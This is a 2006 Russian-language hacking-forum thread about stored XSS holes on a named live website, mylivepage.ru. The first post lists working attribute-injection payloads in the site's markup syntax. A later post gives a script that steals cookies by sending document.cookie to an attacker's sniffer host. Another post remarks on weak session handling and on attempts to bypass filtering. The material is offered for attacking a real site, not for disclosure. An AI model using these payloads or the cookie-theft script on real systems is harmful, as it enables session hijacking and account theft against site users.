HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу mylivepage.ru активные XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

mylivepage.ru активные XSS
  #1  
Старый 19.11.2006, 22:08
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами: 10267526

Репутация: 40
По умолчанию mylivepage.ru активные XSS
mylivepage.ru/
активные XSS в форуме, комментариях, личных сообщениях и везде где можно
оставить своё сообщение.

Нет фильтрации `"` применив дополнительные динамические
параметры тэга img експлуатируем XSS:
[[Smile:"dynsrc="javascript:alert()]]
[[Smile:"lowsrc="javascript:alert()]]
[[Smile:"style="javascript:alert()]]
[[Image:"lowsrc="javascript:alert()]]
[[Image:"style="javascript:alert()]]
[[Image:"dynsrc="javascript:alert()]]
[[http://qwe.ru"style="background:url(javascript:alert())]]
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.11.2006, 22:11
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами: 10267526

Репутация: 40
По умолчанию
ггг совсем забыл про ещё один параметр onerror=
помойму=)))
короче пипец=
мне кажеться хсс самое малое чт отам есть....наверняка там пхп инъекций куча!
и скуль тоже.
 
Ответить с цитированием

  #3  
Старый 13.12.2006, 16:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
там ещё в Опросе есть ....

в вариантах ответа пишем..

Код:
<script>img = new Image(); img.src = "http://site.ru/ваш СниФ.jpg?"+document.cookie;</script>
и куки у нас....
 
Ответить с цитированием

  #4  
Старый 23.12.2006, 14:31
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
С нами: 10210061

Репутация: 31
По умолчанию
Да этот mylivepage.ru даже id сессии не сохраняет и код авторизации всегда один и тот же можно использовать - можно зафлудить по самое не могу.

Правда, слово "<script>" фильтруется полным удалием. Даже <scr<script>ipt> не помогает. Так что че-то затруднился с угоном печенья
Последний раз редактировалось Retscan; 23.12.2006 в 14:52..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49
Активные XSS на www.vip.mp3spy.ru _kREveDKo_ Уязвимости 0 16.06.2006 22:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.